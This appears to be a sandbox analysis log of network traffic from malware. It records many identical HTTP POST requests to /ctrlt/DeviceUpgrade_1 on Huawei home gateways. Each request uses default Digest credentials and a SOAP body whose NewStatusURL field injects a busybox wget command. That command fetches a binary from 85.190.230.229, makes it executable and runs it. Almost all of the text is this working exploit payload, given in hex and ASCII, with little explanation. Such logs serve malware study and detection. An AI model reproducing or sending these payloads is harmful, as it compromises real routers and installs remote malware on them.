                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418143034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410043955 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362128019 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425842047 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361541033 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976857901 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951664925 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      49192.168.2.1447632156.13.73.25037215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.602366924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.934078932 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418092966 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410048008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
